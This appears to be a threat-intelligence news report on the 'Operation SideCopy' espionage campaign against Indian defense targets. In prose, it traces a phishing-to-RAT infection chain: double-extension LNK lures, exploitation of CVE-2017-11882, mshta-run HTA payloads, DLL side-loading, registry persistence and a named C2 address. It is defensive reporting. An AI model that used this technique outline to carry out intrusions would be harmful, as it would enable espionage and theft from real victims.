Recent cybersecurity investigations have revealed an ongoing cyberespionage initiative targeting Indian defense agencies and military personnel, dating back to at least 2019. This operation, identified as “Operation SideCopy” by Quick Heal, an Indian cybersecurity firm, is believed to be orchestrated by an advanced persistent threat (APT) group adept in concealing its activities by mimicking the strategies used by other threat actors, such as SideWinder.
The modus operandi begins with a phishing email containing a malicious attachment, either a ZIP file housing an LNK file or a specially crafted Microsoft Word document. This initial step triggers a sequence of infections, ultimately leading to the deployment of a final-stage payload.
Notably, one infection pathway exploited a long-standing vulnerability in the Microsoft Equation Editor, known as CVE-2017-11882. This flaw, a 20-year-old memory corruption issue within Microsoft Office products, permits remote code execution on compromised systems without user interaction. Microsoft has provided a patch for this vulnerability since November 2017.
The campaign effectively employs social engineering tactics, enticing recipients into opening a seemingly legitimate Word document purporting to discuss India’s defense production policy. The deceptive attachments display double extensions (e.g., “Defence-Production-Policy-2020.docx.lnk”) and feature document icons designed to mislead users into executing the files.
Once activated, these LNK files exploit mshta.exe to execute malicious HTA files hosted on fake websites, created using an open-source payload generation tool named CACTUSTORCH. The first-stage HTA file includes both a decoy document and a malicious .NET module, which leads to the download of a secondary HTA file. This file checks for well-known antivirus programs and then relocates Microsoft’s credential back and restore utility (“credwiz.exe”) to another directory on the victim’s system, setting it to execute upon startup by modifying the system registry.
Upon execution, the compromised file side-loads a malicious “DUser.dll” and launches a RAT module named “winms.exe,” both sourced from the second-stage HTA. This DUser.dll establishes a connection to a remote server via the IP address ‘173.212.224.110’ over TCP port 6102. Following a successful connection, the malware conducts various operations based on commands from its command and control (C2) server, such as gathering and relaying system information back to the attacker.
The RAT shows coding similarities to Allakore Remote, an open-source remote access tool written in Delphi, utilizing the RFB (remote frame buffer) protocol for data exfiltration from the infected system. Moreover, some attack chains have introduced a novel .NET-based RAT nicknamed “Crimson RAT” by Kaspersky. This RAT boasts extensive capabilities, such as accessing files, clipboard data, terminating processes, and executing arbitrary commands.
While the naming conventions of DLL files are reminiscent of the SideWinder group, the primary reliance on open-source tools and distinct command infrastructure leads researchers to suggest a probable connection to the Transparent Tribe APT group. This group, believed to have connections to Pakistan, has recently targeted Indian military and government entities. Quick Heal’s analysis indicates that the actor behind this operation may be a faction of the Transparent Tribe, employing tactics borrowed from other threat groups to obscure their true identity.
